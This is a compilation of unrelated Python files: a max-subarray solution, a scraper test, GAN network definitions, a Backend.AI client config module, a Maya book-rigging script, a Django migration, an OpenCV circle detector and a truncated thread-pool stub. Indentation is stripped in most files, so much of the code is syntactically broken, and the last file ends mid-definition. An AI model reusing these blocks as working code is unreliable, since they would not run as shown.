|
class Solution:
    def maxSubArray(self, nums):
        # Kadane's algorithm: s[i] is the best sum of a subarray ending at index i
        s = [nums[0]] * len(nums)
        for i in range(1, len(nums)):
            s[i] = max(nums[i], s[i - 1] + nums[i])
        return max(s)
if __name__ == '__main__':
    sol = Solution()
    nums = [-1]
    print(sol.maxSubArray(nums))
|
import os
from unittest import TestCase
from lxml import html
from basketball_reference_web_scraper.html import DailyBoxScoresPage
january_01_2017_html = os.path.join(os.path.dirname(__file__), './01_01_2017_box_scores.html')
class TestDailyBoxScoresPage(TestCase):
def setUp(self):
self.january_01_2017_box_scores_file = open(january_01_2017_html)
self.january_01_2017_box_scores = self.january_01_2017_box_scores_file.read()
def tearDown(self):
self.january_01_2017_box_scores_file.close()
def test_game_url_paths_query(self):
page = DailyBoxScoresPage(html=html.fromstring(self.january_01_2017_box_scores))
self.assertEqual(page.game_url_paths_query, '//td[contains(@class, "gamelink")]/a')
def test_parse_urls(self):
page = DailyBoxScoresPage(html=html.fromstring(self.january_01_2017_box_scores))
urls = page.game_url_paths
self.assertEqual(len(urls), 5)
self.assertEqual(urls[0], '/boxscores/201701010ATL.html')
self.assertEqual(urls[1], '/boxscores/201701010IND.html')
self.assertEqual(urls[2], '/boxscores/201701010LAL.html')
self.assertEqual(urls[3], '/boxscores/201701010MIA.html')
self.assertEqual(urls[4], '/boxscores/201701010MIN.html')
|
import math
import torch
import torch.nn as nn
def nl():
return nn.LeakyReLU(0.2, inplace=True)
def conv(ic, oc, k, s, p, bn=True):
model = []
model.append(nn.Conv2d(ic, oc, k, s, p))
if bn:
model.append(nn.BatchNorm2d(oc))
model.append(nl())
return nn.Sequential(*model)
class FeatureExtractor(nn.Module):
def __init__(self, filters):
super(FeatureExtractor, self).__init__()
layers = []
for i, (in_channels, out_channels, kernel_size, stride, padding) in enumerate(filters):
layers.append(conv(in_channels, out_channels, kernel_size, stride, padding, bn=True if i > 0 else False))
self.out_channels = out_channels
self.model = nn.Sequential(*layers)
def forward(self, x):
return self.model(x)
class ModelG(nn.Module):
def __init__(self, channels):
super(ModelG, self).__init__()
channels[0] = (channels[0] + 2) * 2
layers = []
for in_plane, out_plane in zip(channels[:-1], channels[1:]):
layers.append(nn.Linear(in_plane, out_plane))
layers.append(nl())
self.out_channels = channels[-1]
self.model = nn.Sequential(*layers)
def forward(self, x):
return self.model(x)
class ModelF(nn.Module):
def __init__(self, channels):
super(ModelF, self).__init__()
layers = []
for in_plane, out_plane in zip(channels[:-1], channels[1:]):
layers.append(nn.Linear(in_plane, out_plane))
layers.append(nl())
layers.append(nn.Dropout(p=0.5))
layers.append(nn.Linear(channels[-1], 1))
self.model = nn.Sequential(*layers)
def forward(self, x):
return self.model(x)
class RNDiscriminator(nn.Module):
def __init__(self, feature_extractor, g, f):
super(RNDiscriminator, self).__init__()
self.feature_extractor = feature_extractor
self.g = g
self.f = f
self.featuremap_size = None
def forward(self, image):
x = self.feature_extractor(image)
if not self.featuremap_size:
self.featuremap_size = x.size(2)
assert self.featuremap_size == x.size(2)
batch_size = x.size(0)
k = x.size(1)
d = x.size(2)
        # tag each cell with its normalized (-1..1) x/y coordinates
coordinate = torch.arange(-1, 1 + 0.00001, 2 / (d-1)).cuda()
coordinate_x = coordinate.expand(batch_size, 1, d, d)
coordinate_y = coordinate.view(d, 1).expand(batch_size, 1, d, d)
x = torch.cat([x, coordinate_x, coordinate_y], 1)
k += 2
x = x.view(batch_size, k, d ** 2).permute(0, 2, 1)
        # concatenate every object pair (o_i, o_j)
x_left = x.unsqueeze(1).repeat(1, d ** 2, 1, 1).view(batch_size, d ** 4, k)
x_right = x.unsqueeze(2).repeat(1, 1, d ** 2, 1).view(batch_size, d ** 4, k)
x = torch.cat([x_left, x_right], 2)
x = x.view(batch_size * (d ** 4), k * 2)
# g(o_i, o_j, q)
x = self.g(x)
x = x.view(batch_size, d ** 4, x.size(1))
# Σg(o_i, o_j, q)
x = torch.sum(x, dim=1)
# f(Σg(o_i, o_j, q))
x = self.f(x)
return x
class NormalDiscriminator(nn.Module):
def __init__(self, ndf, nc, n_layer):
super(NormalDiscriminator, self).__init__()
layer = []
layer.append(nn.Conv2d(nc, ndf, 4, 2, 1))
layer.append(nl())
layer.append(nn.Conv2d(ndf, ndf * 2, 4, 2, 1))
layer.append(nn.BatchNorm2d(ndf * 2))
layer.append(nl())
layer.append(nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1))
layer.append(nn.BatchNorm2d(ndf * 4))
layer.append(nl())
layer.append(nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1))
layer.append(nn.BatchNorm2d(ndf * 8))
layer.append(nl())
for _ in range(n_layer):
layer.append(nn.Conv2d(ndf * 8, ndf * 8, 4, 2, 1))
layer.append(nn.BatchNorm2d(ndf * 8))
layer.append(nl())
layer.append(nn.Conv2d(ndf * 8, 1, 4, 1, 0))
self.model = nn.Sequential(*layer)
def forward(self, x):
return self.model(x).view(-1, 1)
def define_D(model_type, image_size, ndf, nc):
n_layer = int(math.log2(image_size)) - 6
assert n_layer >= 0
    if model_type == 'dcgan':
        return NormalDiscriminator(ndf, nc, n_layer)  # was hard-coded to (64, 3), ignoring the arguments
elif model_type == 'rngan':
feature_extractor = FeatureExtractor([
(nc, ndf * 1, 4, 2, 1),
(ndf * 1, ndf * 2, 4, 2, 1),
(ndf * 2, ndf * 4, 4, 2, 1),
(ndf * 4, ndf * 8, 4, 2, 1),
] + [(ndf * 8, ndf * 8, 4, 2, 1)] * n_layer)
prev_out_channels = feature_extractor.out_channels
g = ModelG([prev_out_channels, 512, 512, 512, 512])
prev_out_channels = g.out_channels
f = ModelF([prev_out_channels, 512, 512])
return RNDiscriminator(feature_extractor, g, f)
else:
raise NotImplementedError
class Generator(nn.Module):
def __init__(self, nz, ngf, nc, image_size):
super(Generator, self).__init__()
n_layer = int(math.log2(image_size)) - 6
assert n_layer >= 0
layer = []
layer.append(nn.ConvTranspose2d(nz, ngf * 8, 4, 1, 0))
layer.append(nn.BatchNorm2d(ngf * 8))
layer.append(nl())
for _ in range(n_layer):
layer.append(nn.ConvTranspose2d(ngf * 8, ngf * 8, 4, 2, 1))
layer.append(nn.BatchNorm2d(ngf * 8))
layer.append(nl())
layer.append(nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1))
layer.append(nn.BatchNorm2d(ngf * 4))
layer.append(nl())
layer.append(nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1))
layer.append(nn.BatchNorm2d(ngf * 2))
layer.append(nl())
layer.append(nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1))
layer.append(nn.BatchNorm2d(ngf))
layer.append(nl())
layer.append(nn.ConvTranspose2d(ngf, nc, 4, 2, 1))
layer.append(nn.Tanh())
self.model = nn.Sequential(*layer)
def forward(self, z):
return self.model(z)
def define_G(model_type, image_size, nz, ngf, nc):
if model_type == 'dcgan':
return Generator(nz, ngf, nc, image_size)
else:
raise NotImplementedError
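# Usage sketch (an assumption, not part of the original module). Note that
# RNDiscriminator.forward() calls .cuda() internally, so running it needs a GPU.
if __name__ == '__main__':
    netG = define_G('dcgan', image_size=64, nz=100, ngf=64, nc=3)
    netD = define_D('rngan', image_size=64, ndf=64, nc=3)
    z = torch.randn(2, 100, 1, 1)
    print(netG(z).shape)  # torch.Size([2, 3, 64, 64])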
|
import enum
import os
from pathlib import Path
import random
import re
from typing import (
Any,
Callable,
Iterable,
List,
Mapping,
Optional,
Sequence,
Tuple,
TypeVar,
Union,
cast,
)
import appdirs
from yarl import URL
__all__ = [
'parse_api_version',
'get_config',
'set_config',
'APIConfig',
'API_VERSION',
'DEFAULT_CHUNK_SIZE',
'MAX_INFLIGHT_CHUNKS',
]
class Undefined(enum.Enum):
token = object()
_config = None
_undefined = Undefined.token
API_VERSION = (6, '20220315')
MIN_API_VERSION = (5, '20191215')
DEFAULT_CHUNK_SIZE = 16 * (2**20) # 16 MiB
MAX_INFLIGHT_CHUNKS = 4
local_state_path = Path(appdirs.user_state_dir('backend.ai', 'Lablup'))
local_cache_path = Path(appdirs.user_cache_dir('backend.ai', 'Lablup'))
def parse_api_version(value: str) -> Tuple[int, str]:
match = re.search(r'^v(?P<major>\d+)\.(?P<date>\d{8})$', value)
if match is not None:
return int(match.group(1)), match.group(2)
raise ValueError('Could not parse the given API version string', value)
T = TypeVar('T')
def default_clean(v: Union[str, Mapping]) -> T:
return cast(T, v)
def get_env(
key: str,
default: Union[str, Mapping, Undefined] = _undefined,
*,
clean: Callable[[Any], T] = default_clean,
) -> T:
"""
Retrieves a configuration value from the environment variables.
The given *key* is uppercased and prefixed by ``"BACKEND_"`` and then
``"SORNA_"`` if the former does not exist.
:param key: The key name.
:param default: The default value returned when there is no corresponding
environment variable.
:param clean: A single-argument function that is applied to the result of lookup
(in both successes and the default value for failures).
The default is returning the value as-is.
:returns: The value processed by the *clean* function.
"""
key = key.upper()
raw = os.environ.get('BACKEND_' + key)
if raw is None:
raw = os.environ.get('SORNA_' + key)
if raw is None:
if default is _undefined:
raise KeyError(key)
result = default
else:
result = raw
return clean(result)
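# Example (illustrative): with BACKEND_CONNECTION_TIMEOUT=5 set in the
# environment, get_env('connection_timeout', '10.0', clean=float) returns 5.0;
# with neither the BACKEND_ nor the SORNA_ variant set, it returns the default 10.0.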
def bool_env(v: str) -> bool:
v = v.lower()
if v in ('y', 'yes', 't', 'true', '1'):
return True
if v in ('n', 'no', 'f', 'false', '0'):
return False
raise ValueError('Unrecognized value of boolean environment variable', v)
def _clean_urls(v: Union[URL, str]) -> List[URL]:
if isinstance(v, URL):
return [v]
urls = []
if isinstance(v, str):
for entry in v.split(','):
url = URL(entry)
if not url.is_absolute():
raise ValueError('URL {} is not absolute.'.format(url))
urls.append(url)
return urls
def _clean_tokens(v: str) -> Tuple[str, ...]:
if not v:
return tuple()
return tuple(v.split(','))
def _clean_address_map(v: Union[str, Mapping]) -> Mapping:
if isinstance(v, dict):
return v
if not isinstance(v, str):
raise ValueError(
f'Storage proxy address map has invalid type "{type(v)}", expected str or dict.',
)
override_map = {}
for assignment in v.split(","):
try:
k, _, v = assignment.partition("=")
if k == '' or v == '':
raise ValueError
except ValueError:
raise ValueError(f"{v} is not a valid mapping expression")
else:
override_map[k] = v
return override_map
class APIConfig:
"""
Represents a set of API client configurations.
The access key and secret key are mandatory -- they must be set in either
environment variables or as the explicit arguments.
:param endpoint: The URL prefix to make API requests via HTTP/HTTPS.
If this is given as ``str`` and contains multiple URLs separated by comma,
the underlying HTTP request-response facility will perform client-side
load balancing and automatic fail-over using them, assuming that all those
        URLs point to a single, identical cluster.
The users of the API and CLI will get network connection errors only when
all of the given endpoints fail -- intermittent failures of a subset of endpoints
        will be hidden at the cost of slightly increased latency.
:param endpoint_type: Either ``"api"`` or ``"session"``.
If the endpoint type is ``"api"`` (the default if unspecified), it uses the access key and
secret key in the configuration to access the manager API server directly.
If the endpoint type is ``"session"``, it assumes the endpoint is a Backend.AI console server
which provides cookie-based authentication with username and password.
In the latter, users need to use ``backend.ai login`` and ``backend.ai logout`` to
manage their sign-in status, or the API equivalent in
:meth:`~ai.backend.client.auth.Auth.login` and
:meth:`~ai.backend.client.auth.Auth.logout` methods.
:param version: The API protocol version.
:param user_agent: A custom user-agent string which is sent to the API
server as a ``User-Agent`` HTTP header.
:param access_key: The API access key. If deliberately set to an empty string, the API
requests will be made without signatures (anonymously).
:param secret_key: The API secret key.
:param hash_type: The hash type to generate per-request authentication
signatures.
:param vfolder_mounts: A list of vfolder names (that must belong to the given
access key) to be automatically mounted upon any
:func:`Kernel.get_or_create()
<ai.backend.client.kernel.Kernel.get_or_create>` calls.
"""
DEFAULTS: Mapping[str, Union[str, Mapping]] = {
'endpoint': 'https://api.backend.ai',
'endpoint_type': 'api',
'version': f'v{API_VERSION[0]}.{API_VERSION[1]}',
'hash_type': 'sha256',
'domain': 'default',
'group': 'default',
'storage_proxy_address_map': {},
'connection_timeout': '10.0',
'read_timeout': '0',
}
"""
The default values for config parameterse settable via environment variables
xcept the access and secret keys.
"""
_endpoints: List[URL]
_group: str
_hash_type: str
_skip_sslcert_validation: bool
def __init__(
self, *,
endpoint: Union[URL, str] = None,
endpoint_type: str = None,
domain: str = None,
group: str = None,
storage_proxy_address_map: Mapping[str, str] = None,
version: str = None,
user_agent: str = None,
access_key: str = None,
secret_key: str = None,
hash_type: str = None,
vfolder_mounts: Iterable[str] = None,
skip_sslcert_validation: bool = None,
connection_timeout: float = None,
read_timeout: float = None,
announcement_handler: Callable[[str], None] = None,
) -> None:
from . import get_user_agent
self._endpoints = (
_clean_urls(endpoint) if endpoint else
get_env('ENDPOINT', self.DEFAULTS['endpoint'], clean=_clean_urls)
)
random.shuffle(self._endpoints)
self._endpoint_type = endpoint_type if endpoint_type is not None else \
get_env('ENDPOINT_TYPE', self.DEFAULTS['endpoint_type'], clean=str)
self._domain = domain if domain is not None else \
get_env('DOMAIN', self.DEFAULTS['domain'], clean=str)
self._group = group if group is not None else \
get_env('GROUP', self.DEFAULTS['group'], clean=str)
self._storage_proxy_address_map = storage_proxy_address_map \
if storage_proxy_address_map is not None else \
get_env(
'OVERRIDE_STORAGE_PROXY',
self.DEFAULTS['storage_proxy_address_map'],
# The shape of this env var must be like "X1=Y1,X2=Y2"
clean=_clean_address_map,
)
self._version = version if version is not None else \
default_clean(self.DEFAULTS['version'])
self._user_agent = user_agent if user_agent is not None else get_user_agent()
if self._endpoint_type == 'api':
self._access_key = access_key if access_key is not None else \
get_env('ACCESS_KEY', '')
self._secret_key = secret_key if secret_key is not None else \
get_env('SECRET_KEY', '')
else:
self._access_key = 'dummy'
self._secret_key = 'dummy'
self._hash_type = hash_type.lower() if hash_type is not None else \
cast(str, self.DEFAULTS['hash_type'])
arg_vfolders = set(vfolder_mounts) if vfolder_mounts else set()
env_vfolders = set(get_env('VFOLDER_MOUNTS', '', clean=_clean_tokens))
self._vfolder_mounts = [*(arg_vfolders | env_vfolders)]
# prefer the argument flag and fallback to env if the flag is not set.
if skip_sslcert_validation:
self._skip_sslcert_validation = True
else:
self._skip_sslcert_validation = get_env(
'SKIP_SSLCERT_VALIDATION', 'no', clean=bool_env,
)
self._connection_timeout = connection_timeout if connection_timeout is not None else \
get_env('CONNECTION_TIMEOUT', self.DEFAULTS['connection_timeout'], clean=float)
self._read_timeout = read_timeout if read_timeout is not None else \
get_env('READ_TIMEOUT', self.DEFAULTS['read_timeout'], clean=float)
self._announcement_handler = announcement_handler
@property
def is_anonymous(self) -> bool:
return self._access_key == ''
@property
def endpoint(self) -> URL:
"""
The currently active endpoint URL.
This may change if there are multiple configured endpoints
and the current one is not accessible.
"""
return self._endpoints[0]
@property
def endpoints(self) -> Sequence[URL]:
"""All configured endpoint URLs."""
return self._endpoints
def rotate_endpoints(self):
if len(self._endpoints) > 1:
item = self._endpoints.pop(0)
self._endpoints.append(item)
def load_balance_endpoints(self):
pass
@property
def endpoint_type(self) -> str:
"""
The configured endpoint type.
"""
return self._endpoint_type
@property
def domain(self) -> str:
"""The configured domain."""
return self._domain
@property
def group(self) -> str:
"""The configured group."""
return self._group
@property
def storage_proxy_address_map(self) -> Mapping[str, str]:
"""The storage proxy address map for overriding."""
        return self._storage_proxy_address_map  # was self.storage_proxy_address_map (infinite recursion)
@property
def user_agent(self) -> str:
"""The configured user agent string."""
return self._user_agent
@property
def access_key(self) -> str:
"""The configured API access key."""
return self._access_key
@property
def secret_key(self) -> str:
"""The configured API secret key."""
return self._secret_key
@property
def version(self) -> str:
"""The configured API protocol version."""
return self._version
@property
def hash_type(self) -> str:
"""The configured hash algorithm for API authentication signatures."""
return self._hash_type
@property
def vfolder_mounts(self) -> Sequence[str]:
"""The configured auto-mounted vfolder list."""
return self._vfolder_mounts
@property
def skip_sslcert_validation(self) -> bool:
"""Whether to skip SSL certificate validation for the API gateway."""
return self._skip_sslcert_validation
@property
def connection_timeout(self) -> float:
"""The maximum allowed duration for making TCP connections to the server."""
return self._connection_timeout
@property
def read_timeout(self) -> float:
"""The maximum allowed waiting time for the first byte of the response from the server."""
return self._read_timeout
@property
def announcement_handler(self) -> Optional[Callable[[str], None]]:
        """The announcement handler to display server-set announcements."""
return self._announcement_handler
def get_config():
"""
Returns the configuration for the current process.
If there is no explicitly set :class:`APIConfig` instance,
it will generate a new one from the current environment variables
and defaults.
"""
global _config
if _config is None:
_config = APIConfig()
return _config
def set_config(conf: APIConfig):
"""
Sets the configuration used throughout the current process.
"""
global _config
_config = conf
|
#!/usr/bin/env python
# encoding: utf-8
#LTB:import tim_pageSetup;reload(tim_pageSetup);tim_pageSetup.main()
"""
tim_pageSetup.py
Created by Tim Reischmann on 2011-10-26.
Copyright (c) 2011 Tim Reischmann. All rights reserved.
usage:
import tim_pageSetup;reload(tim_pageSetup);tim_pageSetup.main()
set:
jointLength = 12
jointNumber = 8
pages = 5
in main()
"""
import pymel.core as pm
from datetime import datetime
#Global Var definitions
proc_name = "## pageSetup: "
jointLength = 12.0
jointNumber = 12
paperWidth = 12.0
paperLength = jointLength
pages = 34
#pages = 4
degree = 90
UVnormalized = 1
paperSubdivisionsX = 2
paperSubdivisionsY = jointNumber
ctrlRadius = 7.0
jacketBack = 2.3
jacketWidth = 12.8
bookmodel = "X:/Projects/GREY11_ANM71_Rewe_Starzone/GR11A71_Shots/GR11A71_Animatic/Animatic_Maya/Scenes/album_v002.ma"
jacketAttr = ['openL', 'openR', 'bendL', 'bendR', 'twistL', 'twistR']
def main():
prefRun()
#pm.importFile(bookmodel)
containers = createContainers("book")
rigBook(containers)
rigJacket(containers)
organizeContainers(containers)
#moveEnds()
#movePages()
pm.select('world_ctrl', r=1)
def buildJacket():
planeBack = pm.polyPlane(
width=jacketBack,
height=paperLength,
subdivisionsX=paperSubdivisionsX,
subdivisionsY=paperSubdivisionsY,
axis=(0, 1, 0),
createUVs=UVnormalized,
ch=1,
name="planeBack"
)
planeLeft = pm.polyPlane(
width=paperWidth,
height=paperLength,
subdivisionsX=jointNumber,
subdivisionsY=paperSubdivisionsY,
axis=(1, 0, 0),
createUVs=UVnormalized,
ch=1,
name="planeLeft"
)
pm.move(planeLeft, (((jacketBack/2)*-1),paperLength/2,0))
planeRight = pm.polyPlane(
width=paperWidth,
height=paperLength,
subdivisionsX=jointNumber,
subdivisionsY=paperSubdivisionsY,
axis=(1, 0, 0),
createUVs=UVnormalized,
ch=1,
name="planeRight"
)
pm.move(planeRight, (((jacketBack/2)),paperLength/2,0))
jacket = pm.polyUnite(planeBack, planeRight, planeLeft,
ch=0, name="jacket_geo")
pm.select(cl=1)
return jacket
def createContainers(rigName):
#create containers for the geo and rig
baseGroup = pm.group(empty=1, name=rigName)
rig = pm.group(empty=1, name='rig')
geo = pm.group(empty=1, name='geo')
paper_grp = pm.group(empty=1, name='paper_grp')
pages_grp = pm.group(empty=1, name='pages_grp')
jacket_grp = pm.group(empty=1, name='jacket_grp')
pageTargets_grp = pm.group(empty=1, name='pageTargets_grp')
ctrl = createPageCtrl(name='world_ctrl')
jacket_geo = buildJacket()
geo.inheritsTransform.set(0)
pm.select(cl=1)
return {
"pageTargets_grp":pageTargets_grp,
"jacket_geo":jacket_geo,
'pages_grp':pages_grp,
'jacket_grp':jacket_grp,
"ctrl":ctrl,
"baseGroup":baseGroup,
"rig":rig,
"geo":geo,
"paper_grp":paper_grp,
}
def rigJacket(containers):
pm.select(cl=1)
baseJoint = pm.joint(p=(0,0,0), name="jacketBase")
jacketRight = createJointChain(name='jacketRight')
pm.select(jacketRight[0], r=1)
pm.move(0, jacketBack/2, 0)
pm.select(cl=1)
pm.select(baseJoint, r=1)
jacketLeft = createJointChain(name='jacketLeft')
pm.select(jacketLeft[0], r=1)
pm.move(0, ((jacketBack/2)*-1), 0)
pm.select(cl=1)
#create more attrs
pm.addAttr(containers["ctrl"],
ln="__",
at="enum",
en="______"
)
pm.setAttr(containers["ctrl"]+".__", e=1, keyable=1)
jacketAttrNames = []
#create new attr
for attr in jacketAttr:
attrName = containers["ctrl"]+"."+attr
jacketAttrNames.append(attrName)
pm.addAttr(containers["ctrl"],
ln=attr,
at="double",
dv=0)
pm.setAttr(attrName, e=1, keyable=1)
pm.connectAttr( jacketAttrNames[0], jacketLeft[0].rz )
reverseConnectAttr( jacketAttrNames[1], jacketRight[0].rz )
#connect left jacket bend
for joint in jacketLeft:
firstJoint = jacketLeft[0]
lastJoint = jacketLeft[-1]
if joint == firstJoint or joint == lastJoint:
continue
pm.connectAttr( jacketAttrNames[2], joint.rz )
#connect right jacket bend
for joint in jacketRight:
firstJoint = jacketRight[0]
lastJoint = jacketRight[-1]
if joint == firstJoint or joint == lastJoint:
continue
reverseConnectAttr( jacketAttrNames[3], joint.rz )
#connect left jacket twist
for joint in jacketLeft:
firstJoint = jacketLeft[0]
lastJoint = jacketLeft[-1]
if joint == lastJoint:
continue
pm.connectAttr( jacketAttrNames[4], joint.ry )
#connect right jacket twist
for joint in jacketRight:
firstJoint = jacketRight[0]
lastJoint = jacketRight[-1]
if joint == lastJoint:
continue
reverseConnectAttr( jacketAttrNames[5], joint.ry )
pm.select(baseJoint, r=1, hi=1)
pm.select(containers["jacket_geo"], add=1, )
pm.bindSkin(toAll = 1, colorJoints = 1)
pm.select(cl=1)
pm.parent(baseJoint, containers["jacket_grp"])
pm.select(cl=1)
def organizeContainers(containers):
pm.parent(containers["rig"], containers["baseGroup"])
pm.parent(containers["geo"], containers["baseGroup"])
pm.parent(containers["paper_grp"], containers["geo"])
pm.parent(containers["pageTargets_grp"], containers["ctrl"])
pm.parent(containers["pages_grp"], containers["ctrl"])
pm.parent(containers["ctrl"], containers["rig"])
pm.parent(containers["jacket_geo"], containers["geo"])
pm.parent(containers["jacket_grp"], containers["ctrl"])
def rigBook(containers):
center = createJointChain(name='center')
left = createJointChain(name='left')
right = createJointChain(name='right')
ctrl = containers["ctrl"]
pm.addAttr(containers["ctrl"],
ln="_",
at="enum",
en="______"
)
pm.setAttr(containers["ctrl"]+"._", e=1, keyable=1)
for page in range(pages):
pageName = 'page'+str(page)
skin = createJointChain(pageName+"_")
rigPage(skin, center, left, right, ctrl, pageName)
paper = createPaper(pageName)
pm.select(skin, r=1, hi=1)
pm.select(paper, add=1, )
pm.bindSkin(toAll = 1, colorJoints = 1)
pm.select(cl=1)
pm.parent(paper, containers["paper_grp"])
pm.parent(skin[0], containers["pages_grp"])
pm.select(cl=1)
print "rigged: %s" % pageName
pm.parent(center[0], containers["pageTargets_grp"])
pm.parent(left[0], containers["pageTargets_grp"])
pm.parent(right[0], containers["pageTargets_grp"])
def createPaper(pageName):
paper = pm.polyPlane(
width=paperWidth,
height=paperLength,
subdivisionsX=paperSubdivisionsX,
subdivisionsY=paperSubdivisionsY,
axis=(1, 0, 0),
createUVs=UVnormalized,
ch=1,
name=pageName+"_paper_geo"
)
pm.move(paper, 0, paperLength/2, 0)
pm.select(cl=1)
return paper
def createJointChain(name='joint'):
number = jointNumber+1
newChain = []
for i in range(number):
jointName = name+str(i+1)
length = (jointLength/(number-1))*i
newJoint = pm.joint(p=(0,length,0), name=jointName)
newChain.append(newJoint)
pm.select(cl=1)
return newChain
def pl(items):
'''print a list in a nicer format for debugging
'''
for i in items:
print i
def pd(items):
'''print a dict in a nicer format for debugging
'''
for i in items.keys():
print i,"|", items[i]
def colorCtrl(containers):
'''colors the control yellow. Ugly! rewrite!
'''
pm.select(containers["ctrl"], r=1)
    shape = pm.listRelatives(containers["ctrl"], s=1)  # fixed: 's' was an undefined name
pm.setAttr((shape[0]+".overrideEnabled"),1)
pm.setAttr((shape[0]+".overrideColor"),17)
def prefRun():
    '''prefix script run with script name and datetime
'''
print '\n\n\n',proc_name,
print datetime.now(),'##'
def createPageCtrl(name):
control = pm.circle(
c=(0, 0, 0),
nr=(0, 1, 0),
sw=360,
r=ctrlRadius,
d=3, ut=0, tol=0.01, s=8, ch=1,
n=name)
pm.move(control, 0, paperLength/2, 0)
pm.makeIdentity( control, apply=True, translate=True, scale=True, rotate=True)
shape = pm.listRelatives(control)
shape[0].overrideEnabled.set(1)
shape[0].overrideColor.set(17)
pm.select(cl=1)
return name
def reverseConnectAttr(leftAttr, rightAttr):
connector = pm.createNode("multiplyDivide",
name="connect_"+leftAttr.replace('.','_')+"_"+rightAttr.replace('.','_'))
pm.setAttr(connector.operation, 1)
pm.connectAttr(leftAttr, connector.input1X)
pm.setAttr(connector.input2X,-1)
pm.connectAttr( connector.outputX, rightAttr)
def rigPage(skin, center, left, right, ctrl, pageName):
'''This will do the actual page setup.
takes lists of joints: skin, center, left, right
the name of the ctrl
and the desired attr name to add to the ctrl
'''
#Variable Definitions
driveName = ctrl+"."+pageName
#Driven key tangent type
inTangentType = 'linear'
outTangentType = 'linear'
#create new attr
pm.addAttr(ctrl, ln=pageName, at="double", min=-10, max=10, dv=0)
pm.setAttr(driveName, e=1, keyable=1)
for j in range(len(skin)):
#create a blend weighted node for translate x, y, z and rotate x, y, z
rx = pm.createNode("blendWeighted", n=(skin[j]+"rx").replace("|", "_"))
ry = pm.createNode("blendWeighted", n=(skin[j]+"ry").replace("|", "_"))
rz = pm.createNode("blendWeighted", n=(skin[j]+"rz").replace("|", "_"))
tx = pm.createNode("blendWeighted", n=(skin[j]+"tx").replace("|", "_"))
ty = pm.createNode("blendWeighted", n=(skin[j]+"ty").replace("|", "_"))
tz = pm.createNode("blendWeighted", n=(skin[j]+"tz").replace("|", "_"))
        '''blendWeighted
        is one of those nodes that don't work right away: you need to assign a
        value to an attribute before the node actually creates it. The loop
        below creates inputs and weights for translate x, y, z and rotate x, y, z.
        '''
        # initialize three weights (w[0..2]) and inputs (i[0..2]) on every node
        for node in (rx, ry, rz, tx, ty, tz):
            for idx in range(3):
                node.w[idx].set(0)
                node.i[idx].set(0)
#connect target joints to blendweights
left[j].rx.connect(rx.i[0])
left[j].ry.connect(ry.i[0])
left[j].rz.connect(rz.i[0])
center[j].rx.connect(rx.i[1])
center[j].ry.connect(ry.i[1])
center[j].rz.connect(rz.i[1])
right[j].rx.connect(rx.i[2])
right[j].ry.connect(ry.i[2])
right[j].rz.connect(rz.i[2])
left[j].tx.connect(tx.i[0])
left[j].ty.connect(ty.i[0])
left[j].tz.connect(tz.i[0])
center[j].tx.connect(tx.i[1])
center[j].ty.connect(ty.i[1])
center[j].tz.connect(tz.i[1])
right[j].tx.connect(tx.i[2])
right[j].ty.connect(ty.i[2])
right[j].tz.connect(tz.i[2])
#connect blendweights to their respective connections
rx.o.connect(skin[j].rx)
ry.o.connect(skin[j].ry)
rz.o.connect(skin[j].rz)
tx.o.connect(skin[j].tx)
ty.o.connect(skin[j].ty)
tz.o.connect(skin[j].tz)
        # set driven keys on the blend weights: driver value -10 selects the
        # "left" targets (w[0]), 0 the "center" targets (w[1]), and 10 the
        # "right" targets (w[2]), for both rotation and translation
        for dv, weights in ((-10, (1, 0, 0)), (0, (0, 1, 0)), (10, (0, 0, 1))):
            for idx, v in enumerate(weights):
                for node in (rx, ry, rz, tx, ty, tz):
                    pm.setDrivenKeyframe(node.w[idx], itt=inTangentType, ott=outTangentType, cd=driveName, dv=dv, v=v)
def moveEnds():
pm.select('left2', r=1, hi=1)
joints = pm.ls(sl=1)
for joint in joints:
joint.rz.set(degree)
pm.select('right2', r=1, hi=1)
joints = pm.ls(sl=1)
for joint in joints:
joint.rz.set(degree*-1)
def moveEnds2():
    # rotate each named joint group; right-side joints get the mirrored
    # (negative) rotation
    for name, offset in (('left1', 10), ('right1', 10), ('left2', 70), ('right2', 70), ('left3', 100), ('right3', 100)):
        sign = 1 if name.startswith('left') else -1
        try:
            pm.select(name, r=1)
            for joint in pm.ls(sl=1):
                joint.rz.set(sign * (degree - offset))
        except:
            pass
def movePages():
    book = pm.ls('world_ctrl')[0]
    for page in range(pages):
        print page, "|", (book+"."+('page'+str(page)))
        #pm.setAttr(book+"."+('page'+str(page)),-10)
        # 20.0 keeps the step a float; 20/pages truncates to 0 under Python 2
        pm.setAttr(book+"."+('page'+str(page)), pm.getAttr(book+"."+('page'+str(page)))+((20.0/pages)*page) )
|
# Generated by Django 3.0.4 on 2020-04-04 22:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('boards', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='content',
field=models.TextField(default='', max_length=2400),
),
migrations.AlterField(
model_name='comment',
name='published_on_date',
field=models.DateTimeField(auto_now_add=True),
),
]
|
import cv2
import numpy as np
from math import pi
img = cv2.imread('test.jpeg', 0)
img = cv2.medianBlur(img, 5)
# HoughCircles needs a grayscale input; keep a BGR copy for drawing colored circles
output_img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
circles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 1, 100, param1=100, param2=30, minRadius=0, maxRadius=0)
# HoughCircles returns None when no circle is found, so guard before drawing
if circles is not None:
circles = np.uint16(np.around(circles))
#print(len(circles[0])/3)
print(circles)
for i in circles[0, :]:
        #i[0] x and i[1] y of the center, i[2] radius
print(pi * i[2])
# draw the outer circle
        cv2.circle(output_img, (i[0], i[1]), i[2], (0, 255, 0), 2)
# draw the center of the circle
        cv2.circle(output_img, (i[0], i[1]), 2, (0, 0, 255), 3)
else:
print("Nothing found.")
#scale
resized_img = cv2.resize(output_img, (500, 500))
cv2.imshow('detected circles', resized_img)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
"""
Esta clase contiene una coleccion de threads los cuales se van a dedicar a cumplir
tasks conforme se estas sean agregadas al task(Queue). Gracias a esta implementacion
el servidor va a poder servir varias conexiones al mismo tiempo.
"""
from Queue import Queue
from trabajador import Trabajador
class ThreadPool:
def __init__(self, num_hilos):
